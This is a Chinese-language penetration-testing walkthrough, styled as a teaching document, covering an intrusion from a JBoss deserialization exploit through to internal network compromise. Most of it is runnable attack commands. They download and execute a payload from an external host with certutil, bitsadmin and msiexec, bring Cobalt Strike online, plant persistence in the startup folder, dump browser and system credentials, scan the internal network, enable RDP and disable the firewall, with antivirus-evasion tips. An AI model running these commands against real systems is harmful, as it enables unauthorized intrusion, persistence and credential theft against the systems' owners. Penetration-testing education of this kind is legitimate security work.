记一次从jboss到内网渗透实战
字数 1269 2025-08-24 16:48:07
从JBoss反序列化到内网渗透实战教学文档
1. 外网打点阶段
1.1 JBoss反序列化漏洞利用
关键步骤:
-
使用jexboss工具直接获取shell:
python jexboss.py -u http://xx.xx.xx.xx/ -
获取shell后执行基础信息收集:
whoami # 查看当前用户权限 ipconfig # 查看IP地址 tasklist /svc # 查看进程和服务,检查杀毒软件 ping www.baidu.com # 检查服务器是否出网
1.2 CS(Cobalt Strike)上线
当PowerShell被禁用时的替代方案:
-
使用多种Windows下载命令下载payload:
certutil -urlcache -split -f http://xx.xx.xx.xx:81/bypass123.exe bitsadmin /transfer myDownLoadJob /download /priority normal http://xx.xx.xx.xx:81/bypass123.exe c:\windows\temp\bypass123.exe msiexec /q /i http://xx.xx.xx.xx:81/bypass123.exe -
执行下载的exe文件使CS成功上线
2. 权限维持技术
2.1 基础配置
- 设置合理的延迟时间(推荐sleep 2)
2.2 进程迁移
- 查看进程列表
- 选择稳定进程注入(如explorer.exe)
- 注入获取基于该进程的shell
2.3 启动项维持
copy "111.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
3. 主机信息收集
3.1 系统信息
systeminfo # 获取详细系统信息
关键信息包括:
- 操作系统版本(Windows Server 2012 R2)
- 安装的补丁列表
- 硬件信息
- 网络配置
3.2 网络信息
ipconfig /all # 查看所有网络适配器信息
arp -a # 查看ARP表
netstat -ano # 查看端口占用情况
3.3 域环境检测
net time /domain
ipconfig /all
systeminfo
3.4 凭证收集
-
使用BrowserGhost抓取浏览器保存的密码
BrowserGhost.exe -
使用CS自带功能:
- 抓取hash
- 抓取明文密码
- 查看密码凭证
4. 内网渗透
4.1 网络探测
使用fscan工具进行内网扫描:
fscan64.exe -h xx.xx.xx.1/24
扫描结果分析:
- 存活主机
- 开放端口
- 服务识别
- 漏洞检测
4.2 远程桌面控制
4.2.1 3389端口管理
查询3389状态:
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
查询3389端口号:
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds" /v PortNumber
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
开启3389端口的多种方法:
-
MSF命令:
run post/windows/manage/enable_rdp run getgui -e -
REG命令:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -
WMIC命令:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 -
MSSQL xp_regwrite:
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;
防火墙配置:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
netsh firewall set opmode mode=disable
4.2.2 向日葵远程控制
当3389无法使用时:
- 上传向日葵免安装版本
- 启动向日葵:
SunloginClientSOS_1.1.0_x64.exe - 通过VNC桌面交互获取机器码
- 使用本机向日葵连接
5. 渗透测试工具清单
-
漏洞利用工具:
- jexboss (JBoss反序列化漏洞利用)
-
C2框架:
- Cobalt Strike 4.3
-
信息收集工具:
- BrowserGhost (浏览器密码抓取)
- fscan (内网扫描)
-
远程控制工具:
- 向日葵免安装版
-
辅助工具:
- Windows杀软在线查询服务
- Kali Linux
6. 关键注意事项
- 权限检查:始终确认当前用户权限,优先获取管理员权限
- 杀软规避:上传文件前检查杀毒软件情况
- 网络环境:确认目标是否出网,选择合适的上线方式
- 隐蔽性:合理设置CS的sleep时间,避免过短导致被发现
- 持久化:采用多种权限维持手段确保后续访问
- 信息收集:全面收集系统、网络信息为后续渗透做准备
- 备用方案:准备多种远程控制方式应对不同情况
7. 常见问题解决
-
PowerShell被禁用:
- 使用certutil/bitsadmin/msiexec等替代下载方式
- 直接上传exe文件执行
-
3389无法连接:
- 检查防火墙设置
- 确认端口是否真正开放
- 使用向日葵等替代方案
-
内网扫描无结果:
- 尝试不同网段
- 使用多种扫描工具
- 检查网络拓扑结构
本教学文档涵盖了从外网打点到内网渗透的完整流程,重点突出了JBoss反序列化漏洞利用、权限维持、信息收集和内网横向移动等关键环节的技术细节和实战技巧。